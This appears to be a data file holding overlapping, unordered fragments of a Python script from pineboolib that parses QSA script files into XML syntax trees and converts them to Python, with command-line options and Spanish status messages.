"from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\")",
"callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags =",
"self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn,",
"len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname =",
"description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name",
"['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags =",
"parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write",
"if vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype =",
"Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in args: realpath",
"len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing",
"= False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False",
"XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s",
"% bname).join(text.splitlines())) else: if options.cache: args = [x for x in args if",
"debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject):",
"parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no",
"self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\":",
"else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename):",
"xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None",
"self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if",
"self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags",
"imp import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except",
"sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as",
"# description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname)",
"\".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose:",
"not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer import",
"= [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags =",
"import object from optparse import OptionParser import os import os.path import sys import",
"No se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0:",
"NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags",
"'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self,",
"= False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return",
"except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False except Exception",
"resultado, no hace falta calcular mas continue tree_data = None try: tree_data =",
"= parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True",
"if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if",
"False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\",",
"if options.cache: args = [x for x in args if not os.path.exists((x +",
"metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other = True",
"no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . .",
"argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags",
"import OptionParser import os import os.path import sys import imp import traceback from",
"[\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject):",
"al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in",
"tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags",
"self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None",
"\" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args =",
"class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases,",
"# ----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone = True",
"argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\",",
"class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags",
"classobj = cls break if classobj is None: return None return classobj(tagname) def",
"== 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self",
"argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and",
"default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file",
"set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self,",
"filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir fichero",
"type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS:",
"filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ ==",
"print(\"Fichero %r no encontrado\" % self.name) result = False except Exception as e:",
"+ \".xml\") else: destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast,",
"fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname ==",
"\"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject):",
"DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags =",
"[arg + \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if",
"self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default",
"fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result =",
"break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem",
"= [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags",
"KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if",
"= [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at",
"treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name",
"= ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name =",
"= len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname",
"= False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject):",
"== 0: self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"]",
"CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype,",
"def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\")",
"= Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif",
"super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False",
"destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc())",
"value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1]",
"options.toxml = False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and",
"mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize",
"'\"') if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\")",
"False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {}",
"0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not",
"not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing",
"return source.xml class Module(object): def __init__(self, name, path): self.name = name self.path =",
"self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags =",
"add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list']",
"file load . . .\") options.topython = False try: execute( options, [(arg +",
"destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename)",
"if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY file",
"UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else:",
"enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else:",
"filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s .",
"str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype ==",
"action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options, args) =",
". . . (%.1f%%) \" % (bname, 100.0 * (nf + 1.0) /",
"file . . .\") try: execute(options, [arg + \".xml\" for arg in args])",
"VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\"",
"self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\",",
"debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other =",
"tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class",
"len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\",",
"def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id",
"[\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject):",
"With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags =",
"+ repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype)",
"\".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc())",
"pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text)",
"if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except",
"(repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" %",
"= [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value",
"continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"],",
"= [] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags =",
"= [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if",
"= {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def",
"global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn =",
"al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if",
"= [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\",",
"options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml = True",
"dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml",
"value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def",
"= OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\")",
"load . . .\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\",",
"tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"]",
"dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest",
"cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None:",
"type_arg = 0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\",",
"= [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags",
"dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml",
"polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags",
"print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s",
"self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id =",
"def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject):",
"def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # -----------------",
"{} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in",
"Pythonize and write PY file . . .\") try: execute(options, [arg + \".xml\"",
"== 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags =",
"global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn",
"import os import os.path import sys import imp import traceback from lxml import",
"import sys import imp import traceback from lxml import etree try: from pineboolib.flparser",
"[\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname",
"return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\"",
"name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\"",
"if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\",",
"promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other =",
"flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global",
"Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag =",
"options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" % (bname,",
"continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" %",
"[\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def",
"return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback:",
"class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value):",
"destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if",
"debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"]",
"is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath:",
"add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and",
"None: self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags =",
"tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"]",
"= \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type",
"[\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags =",
"return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname",
"self.name) result = False except Exception as e: print(traceback.format_exc()) result = False if",
"sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename)))",
"% name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo",
"parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname ==",
"% (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No se pudo",
"is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype +",
"tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir",
"return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class",
"abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores",
"argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags =",
"dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python",
"self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags",
"path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name)",
"add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\":",
"[\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject):",
"class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True",
"Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for",
"\"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname",
"False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject):",
"debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall',",
"% (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No",
"= ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject):",
"If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags =",
"True if options.verbose: print(\"Pass 2 - Pythonize and write PY file . .",
"xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn =",
"result = False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser()",
"[\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class",
"os.path import sys import imp import traceback from lxml import etree try: from",
"\"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\"",
"ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1',",
"filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython =",
"\"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\":",
"= True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone =",
"self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem =",
"for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath,",
"= [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class",
"child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn,",
"pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True",
"dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k,",
"not options.toxml: # Si no se quiere guardar resultado, no hace falta calcular",
"options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def",
"DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags =",
"name self.path = path def loadModule(self): fp = None try: description = ('.py',",
"def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args =",
"PY file . . .\") try: execute(options, [arg + \".xml\" for arg in",
"v in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction)",
"= False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id",
"(repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No se pudo analizar",
"\"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags",
"2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache:",
"= [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\"",
"[\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem =",
"[\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname",
"def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems",
"if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if",
"options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\"",
"nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose:",
"except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass",
"['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if",
"2 - Pythonize and write PY file . . .\") try: execute(options, [arg",
"args = [x for x in args if not os.path.exists(x + \".xml\") or",
"class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn,",
"options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist]",
"(%.1f%%) \" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose:",
"if not options.toxml: # Si no se quiere guardar resultado, no hace falta",
"[\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems)",
"return self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id",
"vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values)",
"promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod",
"class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep",
"self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\",",
"KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return",
"dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv)",
". . .\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\")",
"UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata)",
"xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls)",
"# if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0]",
". . . . (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0)",
"\"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype",
"(repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname =",
"se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos",
"def __init__(self, name, path): self.name = name self.path = path def loadModule(self): fp",
". .\") try: execute(options, [arg + \".xml\" for arg in args]) except Exception:",
"['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname",
"True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags",
"and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\"",
"(nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\",",
"\".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ == \"__main__\": main()",
"polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant):",
"try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" %",
"listobj): return self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None):",
"if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in",
"callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class",
"def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description",
"tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"]",
"tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class",
"[\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject):",
"File: %-35s . . . . (%.1f%%) \\r\" % (bname, 100.0 * (nf",
"= [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def",
"(prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se quiere guardar resultado,",
"= \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype =",
"'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is",
"[filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full:",
"promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other =",
"= parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname",
